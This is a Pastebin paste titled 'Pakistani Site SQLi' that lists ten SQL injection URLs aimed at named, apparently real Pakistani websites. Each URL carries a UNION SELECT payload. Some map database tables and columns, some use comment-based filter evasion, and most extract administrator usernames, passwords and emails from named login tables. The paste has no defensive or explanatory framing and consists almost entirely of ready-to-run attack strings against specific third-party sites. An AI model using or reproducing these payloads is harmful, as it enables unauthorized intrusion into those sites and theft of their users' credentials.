Advertisement
exengg

Pakistani Site SQLi

May 21st, 2019
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
  1. http://waterenvironmentforum.pk/news.php?id=-3 UNION ALL SELECT 1,2,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),4,5 -- -
  2.  
  3. https://www.zas.com.pk/news.php?id=-5' UNION ALL SELECT 1,2,3,(SELECT+GROUP_CONCAT(USER_NAME,PWD+SEPARATOR+0x3c62723e)+FROM+zascom_web.admin_login),5,6,7,8 -- -
  4.  
  5. http://www.dynamicseals.com.pk/news.php?mid=-100005' UNION ALL SELECT 1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6 -- -
  6.  
  7. https://www.zas.com.pk/item.php?id=-9' UNION ALL SELECT 1,2,3,4,5,6,7,(/*!%53ELECT*/+/*!50000GROUP_CONCAT(column_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.COLUMNS*//**//*!%57HERE*//**//*!TABLE_NAME*//**/LIKE/**/0x61646d696e5f6c6f67696e),9,10,11,12,13,14,15,16,17,18 -- -
  8.  
  9. http://area92.pk/include/ajax/shop-item.php?id=-1060 UNION ALL SELECT 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6 -- -
  10.  
  11. http://www.brotech.com.pk/products.php?id=-39' UNION ALL SELECT 1,2,(SELECT+GROUP_CONCAT(pass,email+SEPARATOR+0x3c62723e)+FROM+brotechc_bro.login),4 -- -
  12.  
  13. http://www.longlife.com.pk/products.php?id=-7 UNION ALL SELECT 1,(SELECT+GROUP_CONCAT(email,password+SEPARATOR+0x3c62723e)+FROM+longlife2_site.administrators),3,4,5,6,7,8,9,10,11 -- -
  14.  
  15. http://thelight.pk/page.php?id=-2' /*!12345UNION+*/ALL SELECT 1,2,3,4,5,6,7,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+the_light.server),9,10,11,12,13 -- -
  16.  
  17. http://www.speako.pk/page.php?id=-360 UNION ALL SELECT 1,2,3,4,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ speako_speako.gba_admin),6,7,8,9,10,11,12,13,14 -- -
  18.  
  19. http://www.myenergy.com.pk/page.php?id=-46' UNION ALL SELECT 1,2,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+myenergy_db.tbluser),4,5,6 -- -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement